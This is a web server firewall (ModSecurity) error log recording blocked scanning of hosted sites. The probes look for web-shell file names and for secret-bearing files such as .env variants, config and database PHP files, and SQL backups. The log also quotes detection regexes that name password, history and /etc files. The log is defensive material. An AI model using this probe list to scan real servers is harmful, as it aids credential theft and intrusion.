[Tue May 26 14:22:50.296289 2026] [security2:error] [pid 606909:tid 607071] [client 20.226.60.108:14512] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/wp-content/uploads/min.php"] [unique_id "ahVfYl0yRtX9qA7aVUVb3QAAAKU"]
[Tue May 26 14:22:50.660139 2026] [security2:error] [pid 606909:tid 607136] [client 20.226.60.108:42321] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/zoom1.php"] [unique_id "ahVfYl0yRtX9qA7aVUVb7QAAAOY"]
[Tue May 26 14:22:50.660254 2026] [security2:error] [pid 606909:tid 607136] [client 20.226.60.108:42321] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/zoom1.php"] [unique_id "ahVfYl0yRtX9qA7aVUVb7QAAAOY"]
[Tue May 26 14:22:50.835030 2026] [security2:error] [pid 606909:tid 607135] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfYl0yRtX9qA7aVUVb5gAAAOU"]
[Tue May 26 14:22:51.018933 2026] [security2:error] [pid 606909:tid 607126] [client 20.226.60.108:39180] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/lock360.php"] [unique_id "ahVfY10yRtX9qA7aVUVb9AAAANw"]
[Tue May 26 14:22:51.019059 2026] [security2:error] [pid 606909:tid 607126] [client 20.226.60.108:39180] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/lock360.php"] [unique_id "ahVfY10yRtX9qA7aVUVb9AAAANw"]
[Tue May 26 14:22:51.371426 2026] [security2:error] [pid 606909:tid 607048] [client 20.226.60.108:22379] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/b.php"] [unique_id "ahVfY10yRtX9qA7aVUVb_AAAAI4"]
[Tue May 26 14:22:51.371565 2026] [security2:error] [pid 606909:tid 607048] [client 20.226.60.108:22379] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/b.php"] [unique_id "ahVfY10yRtX9qA7aVUVb_AAAAI4"]
[Tue May 26 14:22:51.738668 2026] [security2:error] [pid 606909:tid 607059] [client 20.226.60.108:19072] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/buy.php"] [unique_id "ahVfY10yRtX9qA7aVUVcAgAAAJk"]
[Tue May 26 14:22:51.738766 2026] [security2:error] [pid 606909:tid 607059] [client 20.226.60.108:19072] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/buy.php"] [unique_id "ahVfY10yRtX9qA7aVUVcAgAAAJk"]
[Tue May 26 14:22:51.901321 2026] [security2:error] [pid 606909:tid 607060] [client 4.201.75.230:5468] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dhmwayanad.in.svijaykumar.in"] [uri "/sf.php"] [unique_id "ahVfY10yRtX9qA7aVUVcBgAAAJo"]
[Tue May 26 14:22:51.957536 2026] [security2:error] [pid 606909:tid 607075] [client 20.45.47.31:44830] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "208.91.199.245"] [uri "/.env~"] [unique_id "ahVfY10yRtX9qA7aVUVcBwAAAKk"], referer: https://search.yahoo.com/
[Tue May 26 14:22:51.999168 2026] [security2:error] [pid 606909:tid 607076] [client 20.45.47.31:44706] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "208.91.199.245"] [uri "/.env"] [unique_id "ahVfY10yRtX9qA7aVUVcGAAAAKo"], referer: https://www.google.com/
[Tue May 26 14:22:51.999520 2026] [security2:error] [pid 606909:tid 607122] [client 20.45.47.31:44902] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "208.91.199.245"] [uri "/config/.env"] [unique_id "ahVfY10yRtX9qA7aVUVcGwAAANg"]
[Tue May 26 14:22:51.999767 2026] [security2:error] [pid 606909:tid 607125] [client 20.45.47.31:44764] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "208.91.199.245"] [uri "/.env.old"] [unique_id "ahVfY10yRtX9qA7aVUVcEAAAANs"]
[Tue May 26 14:22:52.000365 2026] [security2:error] [pid 606909:tid 607074] [client 20.45.47.31:44754] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "208.91.199.245"] [uri "/.env.backup"] [unique_id "ahVfY10yRtX9qA7aVUVcEwAAAKg"], referer: https://www.bing.com/search
[Tue May 26 14:22:52.001352 2026] [security2:error] [pid 606909:tid 607073] [client 20.45.47.31:44784] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "208.91.199.245"] [uri "/.env.orig"] [unique_id "ahVfY10yRtX9qA7aVUVcGgAAAKc"], referer: https://www.bing.com/search
[Tue May 26 14:22:52.053596 2026] [security2:error] [pid 606909:tid 607041] [client 20.45.47.31:44828] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/.env.php"] [unique_id "ahVfY10yRtX9qA7aVUVcCgAAAIc"], referer: https://www.google.com/
[Tue May 26 14:22:52.068469 2026] [security2:error] [pid 606909:tid 607150] [client 20.45.47.31:44936] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/config.inc.php"] [unique_id "ahVfY10yRtX9qA7aVUVcFQAAAPQ"]
[Tue May 26 14:22:52.108209 2026] [security2:error] [pid 606909:tid 607105] [client 20.45.47.31:44982] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/configuration.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcIwAAAMc"]
[Tue May 26 14:22:52.108265 2026] [security2:error] [pid 606909:tid 607138] [client 20.45.47.31:45072] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/conf.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcJgAAAOg"], referer: https://search.yahoo.com/
[Tue May 26 14:22:52.108391 2026] [security2:error] [pid 606909:tid 607039] [client 20.45.47.31:45164] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/config/app.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcKgAAAIU"]
[Tue May 26 14:22:52.108759 2026] [security2:error] [pid 606909:tid 607120] [client 20.45.47.31:45130] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/email.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcJQAAANY"], referer: https://www.google.com/
[Tue May 26 14:22:52.108936 2026] [security2:error] [pid 606909:tid 607141] [client 20.45.47.31:45314] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/includes/config.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcLQAAAOs"]
[Tue May 26 14:22:52.109020 2026] [security2:error] [pid 606909:tid 607086] [client 20.45.47.31:45278] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/config/cache.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcLAAAALQ"], referer: https://www.bing.com/search
[Tue May 26 14:22:52.109274 2026] [security2:error] [pid 606909:tid 607139] [client 20.45.47.31:45514] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/db.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcMgAAAOk"], referer: https://www.google.com/search?q=
[Tue May 26 14:22:52.109359 2026] [security2:error] [pid 606909:tid 607055] [client 20.45.47.31:45394] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/lib/database.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcLwAAAJU"]
[Tue May 26 14:22:52.109462 2026] [security2:error] [pid 606909:tid 607110] [client 20.45.47.31:45366] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/lib/config.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcNAAAAMw"]
[Tue May 26 14:22:52.109592 2026] [security2:error] [pid 606909:tid 607108] [client 20.45.47.31:45282] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/config/filesystems.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcNgAAAMo"], referer: https://www.google.com/
[Tue May 26 14:22:52.109689 2026] [security2:error] [pid 606909:tid 607093] [client 20.45.47.31:45264] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/config/services.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcOQAAALs"], referer: https://www.google.com/
[Tue May 26 14:22:52.110128 2026] [security2:error] [pid 606909:tid 607049] [client 20.45.47.31:45258] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/config/email.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcNwAAAI8"], referer: https://www.bing.com/search
[Tue May 26 14:22:52.110215 2026] [security2:error] [pid 606909:tid 607149] [client 20.45.47.31:45144] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/smtp.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcOwAAAPM"]
[Tue May 26 14:22:52.110276 2026] [security2:error] [pid 606909:tid 607050] [client 20.45.47.31:44998] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/settings.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcLgAAAJA"], referer: https://www.bing.com/search
[Tue May 26 14:22:52.110352 2026] [security2:error] [pid 606909:tid 607157] [client 20.45.47.31:45378] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/lib/configuration.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcPwAAAPs"], referer: https://www.google.com/
[Tue May 26 14:22:52.110678 2026] [security2:error] [pid 606909:tid 607118] [client 20.45.47.31:44916] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "208.91.199.245"] [uri "/core/.env"] [unique_id "ahVfZF0yRtX9qA7aVUVcOgAAANQ"], referer: https://search.yahoo.com/
[Tue May 26 14:22:52.111271 2026] [security2:error] [pid 606909:tid 607085] [client 20.45.47.31:45320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/includes/configuration.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcQAAAALM"]
[Tue May 26 14:22:52.111285 2026] [security2:error] [pid 606909:tid 607131] [client 20.45.47.31:44922] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/config.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcRAAAAOE"], referer: https://www.google.com/
[Tue May 26 14:22:52.112703 2026] [security2:error] [pid 606909:tid 607103] [client 20.45.47.31:45300] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/config/broadcasting.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcMwAAAMU"]
[Tue May 26 14:22:52.113891 2026] [security2:error] [pid 606909:tid 607161] [client 20.45.47.31:45680] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "208.91.199.245"] [uri "/backup.sql"] [unique_id "ahVfZF0yRtX9qA7aVUVcRgAAAP8"]
[Tue May 26 14:22:52.113933 2026] [security2:error] [pid 606909:tid 607140] [client 20.45.47.31:45038] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "208.91.199.245"] [uri "/settings.xml"] [unique_id "ahVfZF0yRtX9qA7aVUVcTQAAAOo"]
[Tue May 26 14:22:52.116927 2026] [security2:error] [pid 606909:tid 607145] [client 20.45.47.31:45330] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/includes/database.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcRQAAAO8"], referer: https://duckduckgo.com/
[Tue May 26 14:22:52.117798 2026] [security2:error] [pid 606909:tid 607083] [client 20.45.47.31:45152] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/config/database.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcTwAAALE"], referer: https://search.yahoo.com/
[Tue May 26 14:22:52.117850 2026] [security2:error] [pid 606909:tid 607114] [client 20.45.47.31:45176] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/config/application.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcSwAAANA"], referer: https://search.yahoo.com/
[Tue May 26 14:22:52.118165 2026] [security2:error] [pid 606909:tid 607144] [client 20.45.47.31:45294] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/config/session.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcWAAAAO4"]
[Tue May 26 14:22:52.118673 2026] [security2:error] [pid 606909:tid 607156] [client 20.45.47.31:45420] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/application/config/config.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcVAAAAPo"], referer: https://www.google.com/search?q=
[Tue May 26 14:22:52.118676 2026] [security2:error] [pid 606909:tid 607056] [client 20.45.47.31:45562] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/db_config.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcVwAAAJY"], referer: https://www.google.com/
[Tue May 26 14:22:52.118773 2026] [security2:error] [pid 606909:tid 607116] [client 20.45.47.31:45510] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/database.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcUgAAANI"]
[Tue May 26 14:22:52.118780 2026] [security2:error] [pid 606909:tid 607070] [client 20.45.47.31:45270] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/config/auth.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcVQAAAKQ"], referer: https://www.google.com/search?q=
[Tue May 26 14:22:52.118858 2026] [security2:error] [pid 606909:tid 607094] [client 20.45.47.31:45200] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/config/config.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcSgAAALw"], referer: https://duckduckgo.com/
[Tue May 26 14:22:52.118961 2026] [security2:error] [pid 606909:tid 607158] [client 20.45.47.31:45432] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/application/config/database.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcWQAAAPw"], referer: https://search.yahoo.com/
[Tue May 26 14:22:52.118968 2026] [security2:error] [pid 606909:tid 607066] [client 20.45.47.31:45412] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/system/configuration.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcWgAAAKA"], referer: https://search.yahoo.com/
[Tue May 26 14:22:52.118971 2026] [security2:error] [pid 606909:tid 607054] [client 20.45.47.31:45456] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/app/config/config.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcXQAAAJQ"], referer: https://www.google.com/
[Tue May 26 14:22:52.118995 2026] [security2:error] [pid 606909:tid 607147] [client 20.45.47.31:45452] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/application/config/constants.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcXwAAAPE"], referer: https://www.google.com/
[Tue May 26 14:22:52.118997 2026] [security2:error] [pid 606909:tid 607102] [client 20.45.47.31:45356] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/inc/configuration.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcYQAAAMQ"], referer: https://www.google.com/
[Tue May 26 14:22:52.119066 2026] [security2:error] [pid 606909:tid 607078] [client 20.45.47.31:45436] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/application/config/email.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcXAAAAKw"]
[Tue May 26 14:22:52.119142 2026] [security2:error] [pid 606909:tid 607061] [client 20.45.47.31:45286] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/config/queue.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcXgAAAJs"]
[Tue May 26 14:22:52.119467 2026] [security2:error] [pid 606909:tid 607080] [client 20.45.47.31:44892] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "208.91.199.245"] [uri "/.env.bak"] [unique_id "ahVfZF0yRtX9qA7aVUVcbQAAAK4"]
